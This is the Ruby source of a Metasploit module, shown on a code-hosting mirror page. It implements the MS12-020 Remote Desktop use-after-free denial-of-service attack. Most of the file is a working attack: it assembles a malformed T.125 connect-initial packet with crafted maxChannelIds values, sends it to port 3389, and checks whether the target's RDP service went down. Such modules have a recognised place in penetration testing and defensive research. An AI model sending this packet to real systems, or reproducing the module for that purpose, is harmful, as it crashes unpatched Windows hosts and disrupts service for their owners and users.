CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
Views: 11789
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Report

8
  include Msf::Exploit::Remote::Tcp

9
  include Msf::Auxiliary::Dos

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'MS12-020 Microsoft Remote Desktop Use-After-Free DoS',

14
      'Description'    => %q{

15
        This module exploits the MS12-020 RDP vulnerability originally discovered and

16
        reported by Luigi Auriemma.  The flaw can be found in the way the T.125

17
        ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result

18
        an invalid pointer being used, therefore causing a denial-of-service condition.

19
      },

20
      'References'     =>

21
        [

22
          [ 'CVE', '2012-0002' ],

23
          [ 'MSB', 'MS12-020' ],

24
          [ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],

25
          [ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],

26
          [ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],

27
          [ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],

28
          [ 'EDB', '18606' ],

29
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/' ]

30
        ],

31
      'Author'         =>

32
        [

33
          'Luigi Auriemma',

34
          'Daniel Godas-Lopez',  # Entirely based on Daniel's pastie

35
          'Alex Ionescu',

36
          'jduck',

37
          '#ms12-020' # Freenode IRC

38
        ],

39
      'License'        => MSF_LICENSE,

40
      'DisclosureDate' => '2012-03-16'

41
    ))

42


43
    register_options(

44
      [

45
        Opt::RPORT(3389)

46
      ])

47
  end

48


49
  def is_rdp_up

50
    begin

51
      connect

52
      disconnect

53
      return true

54
    rescue Rex::ConnectionRefused

55
      return false

56
    rescue Rex::ConnectionTimeout

57
      return false

58
    end

59
  end

60


61
  def run

62
    max_channel_ids = "\x02\x01\xff"

63


64
    pkt = ''+

65
      "\x03\x00\x00\x13" +  # TPKT: version + length

66
      "\x0E\xE0\x00\x00" +  # X.224 (connection request)

67
      "\x00\x00\x00\x01" +

68
      "\x00\x08\x00\x00" +

69
      "\x00\x00\x00"     +

70
      "\x03\x00\x00\x6A" +  # TPKT: version + length

71
      "\x02\xF0\x80"     +  # X.224 (connect-initial)

72
      "\x7F\x65\x82\x00" +  # T.125

73
      "\x5E"             +

74
      "\x04\x01\x01"     +  # callingDomainSelector

75
      "\x04\x01\x01"     +  # calledDomainSelector

76
      "\x01\x01\xFF"     +  # upwardFlag

77
      "\x30\x19"         +  # targetParameters

78
      max_channel_ids    +  # maxChannelIds

79
      "\x02\x01\xFF"     +  # maxUserIds

80
      "\x02\x01\x00"     +  # maxTokenIds

81
      "\x02\x01\x01"     +  # numPriorities

82
      "\x02\x01\x00"     +  # minThroughput

83
      "\x02\x01\x01"     +  # maxHeight

84
      "\x02\x02\x00\x7C" +  # maxMCSPDUsize

85
      "\x02\x01\x02"     +  # protocolVersion

86
      "\x30\x19"         +  # minimumParameters

87
      max_channel_ids    +  # maxChannelIds

88
      "\x02\x01\xFF"     +  # maxUserIds

89
      "\x02\x01\x00"     +  # maxTokenIds

90
      "\x02\x01\x01"     +  # numPriorities

91
      "\x02\x01\x00"     +  # minThroughput

92
      "\x02\x01\x01"     +  # maxHeight

93
      "\x02\x02\x00\x7C" +  # maxMCSPDUsize

94
      "\x02\x01\x02"     +  # protocolVersion

95
      "\x30\x19"         +  # maximumParameters

96
      max_channel_ids    +  # maxChannelIds

97
      "\x02\x01\xFF"     +  # maxUserIds

98
      "\x02\x01\x00"     +  # maxTokenIds

99
      "\x02\x01\x01"     +  # numPriorities

100
      "\x02\x01\x00"     +  # minThroughput

101
      "\x02\x01\x01"     +  # maxHeight

102
      "\x02\x02\x00\x7C" +  # maxMCSPDUsize

103
      "\x02\x01\x02"     +  # protocolVersion

104
      "\x04\x82\x00\x00" +  # userData

105
      "\x03\x00\x00\x08" +  # TPKT: version + length

106
      "\x02\xF0\x80"     +  # X.224

107
      "\x28"             +  # T.125

108
      "\x03\x00\x00\x08" +  # TPKT: version + length

109
      "\x02\xF0\x80"     +  # X.224

110
      "\x28"             +  # T.125

111
      "\x03\x00\x00\x08" +  # TPKT: version + length

112
      "\x02\xF0\x80"     +  # X.224

113
      "\x28"             +  # T.125

114
      "\x03\x00\x00\x08" +  # TPKT: version + length

115
      "\x02\xF0\x80"     +  # X.224

116
      "\x28"             +  # T.125

117
      "\x03\x00\x00\x08" +  # TPKT: version + length

118
      "\x02\xF0\x80"     +  # X.224

119
      "\x28"             +  # T.125

120
      "\x03\x00\x00\x08" +  # TPKT: version + length

121
      "\x02\xF0\x80"     +  # X.224

122
      "\x28"             +  # T.125

123
      "\x03\x00\x00\x08" +  # TPKT: version + length

124
      "\x02\xF0\x80"     +  # X.224

125
      "\x28"             +  # T.125

126
      "\x03\x00\x00\x08" +  # TPKT: version + length

127
      "\x02\xF0\x80"     +  # X.224

128
      "\x28"             +  # T.125

129
      "\x03\x00\x00\x0C" +  # TPKT: version + length

130
      "\x02\xF0\x80"     +  # X.224

131
      "\x38\x00\x06\x03" +  # T.125

132
      "\xF0"             +

133
      "\x03\x00\x00\x09" +  # TPKT: version + length

134
      "\x02\xF0\x80"     +  # X.224

135
      "\x21\x80"            # T.125

136


137
    unless is_rdp_up

138
      print_error("#{rhost}:#{rport} - RDP Service Unreachable")

139
      return

140
    end

141


142
    connect

143
    print_status("#{rhost}:#{rport} - Sending #{self.name}")

144
    sock.put(pkt)

145
    Rex.sleep(3)

146
    disconnect

147
    print_status("#{rhost}:#{rport} - #{pkt.length.to_s} bytes sent")

148


149
    print_status("#{rhost}:#{rport} - Checking RDP status...")

150


151
    if is_rdp_up

152
      print_error("#{rhost}:#{rport} - RDP Service Unreachable")

153
      return

154
    else

155
      print_good("#{rhost}:#{rport} seems down")

156
      report_vuln({

157
        :host => rhost,

158
        :port => rport,

159
        :name => self.name,

160
        :refs => self.references,

161
        :info => "Module #{self.fullname} successfully crashed the target system via RDP"

162
      })

163
    end

164


165
  end

166
end

167


168